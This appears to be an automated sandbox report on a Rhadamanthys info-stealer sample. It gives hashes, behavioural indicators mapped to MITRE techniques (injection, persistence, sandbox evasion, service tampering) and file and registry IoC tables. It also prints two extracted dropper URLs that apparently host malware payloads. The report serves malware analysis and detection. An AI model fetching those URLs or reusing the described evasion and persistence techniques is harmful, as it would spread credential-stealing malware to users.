rhadamanthys | a7edd49ec36552504d0b7940037e79de8f9918e0271ba96bad47076cb24f7ee1

Analysis

max time kernel
149s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
22-06-2024 21:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 1628 created 5348 1628 WerFault.exe cmd.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

efckgwgt.pjh1.exesvchost.exe

description pid process target process

PID 4444 created 2700 4444 efckgwgt.pjh1.exe sihost.exe
PID 5296 created 5348 5296 svchost.exe cmd.exe
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exemsiexec.exepowershell.exe

flow pid process

10 1672 powershell.exe
14 1672 powershell.exe
31 4404 powershell.exe
33 3572 powershell.exe
54 4156 msiexec.exe
63 3692 powershell.exe
66 4200
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1672 powershell.exe
3572 powershell.exe
3108 powershell.exe
4404 powershell.exe
3692 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

description	pid	process	target process
PID 1628 created 5348	1628	WerFault.exe	cmd.exe

description	pid	process	target process
PID 4444 created 2700	4444	efckgwgt.pjh1.exe	sihost.exe
PID 5296 created 5348	5296	svchost.exe	cmd.exe

flow	pid	process
10	1672	powershell.exe
14	1672	powershell.exe
31	4404	powershell.exe
33	3572	powershell.exe
54	4156	msiexec.exe
63	3692	powershell.exe
66	4200

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exeefckgwgt.pjh0.exeefckgwgt.pjh3.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	efckgwgt.pjh0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	efckgwgt.pjh3.exe

Executes dropped EXE 4 IoCs

Processes:

efckgwgt.pjh0.exeefckgwgt.pjh1.exeefckgwgt.pjh2.exeefckgwgt.pjh3.exe

pid process

1796 efckgwgt.pjh0.exe
4444 efckgwgt.pjh1.exe
1628 efckgwgt.pjh2.exe
4124 efckgwgt.pjh3.exe
Loads dropped DLL 6 IoCs

Processes:

MsiExec.exeMsiExec.exeMsiExec.exe

pid process

5840 MsiExec.exe
5840 MsiExec.exe
5840 MsiExec.exe
5840 MsiExec.exe
424 MsiExec.exe
6028 MsiExec.exe

pid	process
1796	efckgwgt.pjh0.exe
4444	efckgwgt.pjh1.exe
1628	efckgwgt.pjh2.exe
4124	efckgwgt.pjh3.exe

pid	process
5840	MsiExec.exe
5840	MsiExec.exe
5840	MsiExec.exe
5840	MsiExec.exe
424	MsiExec.exe
6028	MsiExec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

14 bitbucket.org
33 bitbucket.org
13 bitbucket.org
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

2252 powercfg.exe
3724 powercfg.exe
1240 powercfg.exe
3896 powercfg.exe

flow	ioc
14	bitbucket.org
33	bitbucket.org
13	bitbucket.org

pid	process
2252	powercfg.exe
3724	powercfg.exe
1240	powercfg.exe
3896	powercfg.exe

Drops file in System32 directory 12 IoCs

Processes:

svchost.exesvchost.exeefckgwgt.pjh2.exesvchost.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RunNodeScriptAtLogon	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	efckgwgt.pjh2.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

efckgwgt.pjh2.exe

description pid process target process

PID 1628 set thread context of 628 1628 efckgwgt.pjh2.exe dialer.exe

description	pid	process	target process
PID 1628 set thread context of 628	1628	efckgwgt.pjh2.exe	dialer.exe

Drops file in Program Files directory 64 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\signal-handling.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\MSVSProject.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\className.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\example\callback.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\bin\npm.ps1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-token.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\negotiator\lib\language.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\folders.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\unstar.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\registry.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\node_modules\lru-cache\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\dist\parse-proxy-response.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explore.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\dist\asn1\error.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\strip-ansi-cjs\license	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmversion\lib\retrieve-tag.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\read\lib\read.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmversion\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\request.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\packaging\_elffile.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\LICENSE-MIT	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\dist\cjs\browser.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\diff\character.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-expression-parse\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cli-columns\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\has-color.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\workspaces\get-workspaces.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\streams.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\MSVSNew.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\lib\clean-url.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-exec.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\function-bind\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\socks\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\util\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\src\utils.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\has-magic.d.ts.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man7\developers.7	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\clone.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\lib\default-opts.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-shrinkwrap.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explain.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\indent-string\license	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\folders.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\foreground-child\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\unique-filename\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-sized\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-audit.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\index.d.ts.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\gtr.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-license-ids\deprecated.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-search.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-uninstall.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\set-immediate.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\spin.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man5\npm-global.5	msiexec.exe

Drops file in Windows directory 17 IoCs

Processes:

msiexec.exesvchost.exe

description	ioc	process
File created	C:\Windows\Installer\e58725c.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7F6F.tmp	msiexec.exe
File created	C:\Windows\Installer\e587260.msi	msiexec.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\Installer\MSI749E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI74DE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI74EF.tmp	msiexec.exe
File created	C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\e58725c.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8BF3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDAD0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDC96.tmp	msiexec.exe

Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1292 sc.exe
1684 sc.exe
1640 sc.exe
2292 sc.exe
2360 sc.exe
1872 sc.exe
3868 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1292	sc.exe
1684	sc.exe
1640	sc.exe
2292	sc.exe
2360	sc.exe
1872	sc.exe
3868	sc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
5204	timeout.exe
4464	timeout.exe
5100	timeout.exe
2220	timeout.exe
1992	timeout.exe
4360	timeout.exe
4240	timeout.exe
1264	timeout.exe
1956	timeout.exe
5416	timeout.exe
3248	timeout.exe
4432	timeout.exe
6080	timeout.exe
5812	timeout.exe
5400	timeout.exe
4368	timeout.exe
1348	timeout.exe
4500	timeout.exe
1584	timeout.exe
1836	timeout.exe
5204	timeout.exe
5780	timeout.exe
1440	timeout.exe
5368	timeout.exe
3836	timeout.exe
4820	timeout.exe
5600	timeout.exe
4448	timeout.exe
5748	timeout.exe
5912	timeout.exe
944	timeout.exe
804	timeout.exe
4800	timeout.exe
5972	timeout.exe
944	timeout.exe
4036	timeout.exe
2616	timeout.exe
5748	timeout.exe
844	timeout.exe
5056	timeout.exe
5028	timeout.exe
1328	timeout.exe
5912	timeout.exe
3528	timeout.exe
4208	timeout.exe
2520	timeout.exe
1836	timeout.exe
4236	timeout.exe
4852	timeout.exe
2900	timeout.exe
852	timeout.exe
4188	timeout.exe
5936	timeout.exe
6076	timeout.exe
5212	timeout.exe
3684	timeout.exe
2616	timeout.exe
4500	timeout.exe
4536	timeout.exe
5936	timeout.exe
4584	timeout.exe
3832	timeout.exe
4208	timeout.exe
5888	timeout.exe

Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5208 tasklist.exe
3868 tasklist.exe
5580 tasklist.exe
5488 tasklist.exe
5768 tasklist.exe
5212 tasklist.exe
4396 tasklist.exe
3156 tasklist.exe
Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

WerFault.exe

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5376 taskkill.exe
3392 taskkill.exe
5708 taskkill.exe
5660 taskkill.exe
5936 taskkill.exe
3988 taskkill.exe
3800 taskkill.exe
3456 taskkill.exe

pid	process
5208	tasklist.exe
3868	tasklist.exe
5580	tasklist.exe
5488	tasklist.exe
5768	tasklist.exe
5212	tasklist.exe
4396	tasklist.exe
3156	tasklist.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

pid	process
5376	taskkill.exe
3392	taskkill.exe
5708	taskkill.exe
5660	taskkill.exe
5936	taskkill.exe
3988	taskkill.exe
3800	taskkill.exe
3456	taskkill.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

OfficeClickToRun.exesvchost.exemsiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 22 Jun 2024 21:33:51 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A31D4721-5E2A-48C1-94D9-9FB805280A2A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1719092030"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	msiexec.exe

Modifies registry class 64 IoCs

Processes:

msiexec.exeRuntimeBroker.exeExplorer.EXEsihost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902- = "\\\\?\\Volume{80B4582B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3cb6a01a3d869126997a59aec3c7720e72b03f778da1ad633797e986f09cab9d"	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0a34282f-6cae-4cd1-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0a34282f-6cae-4cd1-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";"	msiexec.exe
